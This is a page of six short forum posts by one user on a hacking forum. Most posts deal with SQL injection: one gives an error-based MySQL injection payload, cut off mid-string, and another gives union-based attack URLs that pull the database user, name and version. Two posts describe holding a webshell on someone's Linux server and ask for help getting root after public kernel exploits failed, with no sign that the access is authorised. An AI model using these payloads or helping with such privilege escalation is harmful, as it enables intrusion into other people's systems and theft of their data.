Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Current Page: 1 of 1
Results 1 - 6 of 6
2 years ago
DebugZer0
this url can be injected with post method. payload: id=3 AND (SELECT 6108 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,110,58),(SELECT (CASE WHEN (6108=6108) THEN 1 ELSE 0 END)),CHAR(58,117,100,98,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) id=3 AND (SELECT 6108 FROM(SELECT COUNT(*),CONCAT(CHAR(58,115,114,110,58),(SELECT (CASE WHEN (6108=6108) THEN 1 ELSE 0 END)),CHAR(5
Forum: SQL and Code Injection
2 years ago
DebugZer0
no,it doesn`t work.seems this server has been patched very well. i tried all exploits that i can find but still cannt root it.
Forum: OMG Ponies
2 years ago
DebugZer0
hello guys,there is a server and I`ve already got the webshell,the os is linux and kernel version is 2.6.18-92 and i have tried all the exploits on internet but cannt get root of it,any ideas ?
Forum: OMG Ponies
2 years ago
DebugZer0
any download url?
Forum: Projects
2 years ago
DebugZer0
well,as you can use the GET method to inject it,why not use a auto tool?like sqlmap or sth else...
Forum: SQL and Code Injection
2 years ago
DebugZer0
the variables $passkey and $usernamepass are not filtered well.a hacker can use sql command to get the data what he wants. like that: attack1.php?pass=1+order+by+NUM attack1.php?pass=1+and+8=-2+union+select+concat_ws(0x3a,user(),database(),version())/* also you can do the same thing with $username,both of them are unsecurity.
Forum: SQL and Code Injection
Current Page: 1 of 1